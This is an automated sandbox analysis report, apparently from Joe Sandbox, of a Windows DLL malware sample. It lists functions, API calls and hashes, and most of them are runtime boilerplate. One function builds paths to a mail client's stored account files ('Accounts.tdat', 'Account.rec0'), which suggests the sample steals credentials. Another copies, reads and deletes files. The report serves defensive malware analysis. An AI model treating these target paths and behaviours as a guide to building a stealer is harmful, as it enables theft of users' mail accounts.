                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                              • _free.LIBCMT ref: 10007CFB
                                                                • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                              • _free.LIBCMT ref: 10007D1D
                                                              • _free.LIBCMT ref: 10007D32
                                                              • _free.LIBCMT ref: 10007D3D
                                                              • _free.LIBCMT ref: 10007D5F
                                                              • _free.LIBCMT ref: 10007D72
                                                              • _free.LIBCMT ref: 10007D80
                                                              • _free.LIBCMT ref: 10007D8B
                                                              • _free.LIBCMT ref: 10007DC3
                                                              • _free.LIBCMT ref: 10007DCA
                                                              • _free.LIBCMT ref: 10007DE7
                                                              • _free.LIBCMT ref: 10007DFF
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                              • String ID:
                                                              • API String ID: 161543041-0
                                                              • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                              • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                              • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                              • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14

                                                              Control-flow Graph

                                                              APIs
                                                              • _free.LIBCMT ref: 100059EA
                                                                • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                              • _free.LIBCMT ref: 100059F6
                                                              • _free.LIBCMT ref: 10005A01
                                                              • _free.LIBCMT ref: 10005A0C
                                                              • _free.LIBCMT ref: 10005A17
                                                              • _free.LIBCMT ref: 10005A22
                                                              • _free.LIBCMT ref: 10005A2D
                                                              • _free.LIBCMT ref: 10005A38
                                                              • _free.LIBCMT ref: 10005A43
                                                              • _free.LIBCMT ref: 10005A51
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                              • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                              • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                              • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84

                                                              Control-flow Graph

                                                              APIs
                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                              • String ID:
                                                              • API String ID: 1454806937-0
                                                              • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                              • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                              • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                              • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70

                                                              Control-flow Graph: function 10009492-10009644 (graph rendering omitted)
                                                              APIs
                                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,10009C07,?,00000000,?,00000000,00000000), ref: 100094D4
                                                              • __fassign.LIBCMT ref: 1000954F
                                                              • __fassign.LIBCMT ref: 1000956A
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                              • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095AF
                                                              • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095E8
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                              • String ID:
                                                              • API String ID: 1324828854-0
                                                              • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                              • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                              • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                              • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60

                                                              Control-flow Graph: function 10003370-100034c6 (graph rendering omitted)
                                                              APIs
                                                              • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                              • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                              • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 1170836740-1018135373
                                                              • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                              • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                              • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                              • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                              • _free.LIBCMT ref: 100092AB
                                                                • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                              • _free.LIBCMT ref: 100092B6
                                                              • _free.LIBCMT ref: 100092C1
                                                              • _free.LIBCMT ref: 10009315
                                                              • _free.LIBCMT ref: 10009320
                                                              • _free.LIBCMT ref: 1000932B
                                                              • _free.LIBCMT ref: 10009336
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                              • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                              • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                              • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751

                                                              Control-flow Graph: function 10008821-10008a3c (graph rendering omitted)
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                              • __freea.LIBCMT ref: 10008A08
                                                                • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                              • __freea.LIBCMT ref: 10008A11
                                                              • __freea.LIBCMT ref: 10008A36
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1414292761-0
                                                              • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                              • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                              • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                              • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                              APIs
                                                              • _strlen.LIBCMT ref: 10001607
                                                              • _strcat.LIBCMT ref: 1000161D
                                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                              • lstrcatW.KERNEL32(?,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1000165A
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                              • lstrcatW.KERNEL32(00001008,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 10001686
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: lstrcatlstrlen$_strcat_strlen
                                                              • String ID:
                                                              • API String ID: 1922816806-0
                                                              • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                              • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                              • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                              • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                              APIs
                                                              • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 10001038
                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                              • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$AttributesFilelstrcat
                                                              • String ID:
                                                              • API String ID: 3594823470-0
                                                              • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                              • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                              • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                              • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                              • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                              • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                              • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                              • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                              • _free.LIBCMT ref: 10005B2D
                                                              • _free.LIBCMT ref: 10005B55
                                                              • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                              • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                              • _abort.LIBCMT ref: 10005B74
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free$_abort
                                                              • String ID:
                                                              • API String ID: 3160817290-0
                                                              • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                              • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                              • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                              • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                              APIs
                                                                • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                              • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                              • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                              • API String ID: 4036392271-1520055953
                                                              • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                              • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                              • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                              • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                              • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                              • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                              • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                              • _free.LIBCMT ref: 100071B8
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                              • String ID:
                                                              • API String ID: 336800556-0
                                                              • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                              • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                              • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                              • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                              • _free.LIBCMT ref: 10005BB4
                                                              • _free.LIBCMT ref: 10005BDB
                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free
                                                              • String ID:
                                                              • API String ID: 3170660625-0
                                                              • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                              • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                              • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                              • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                              • lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                              • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                              • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                              • lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$lstrcat
                                                              • String ID:
                                                              • API String ID: 493641738-0
                                                              • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                              • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                              • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                              • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                              APIs
                                                              • _free.LIBCMT ref: 100091D0
                                                                • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                              • _free.LIBCMT ref: 100091E2
                                                              • _free.LIBCMT ref: 100091F4
                                                              • _free.LIBCMT ref: 10009206
                                                              • _free.LIBCMT ref: 10009218
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                              • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                              • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                              • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                              APIs
                                                              • _free.LIBCMT ref: 1000536F
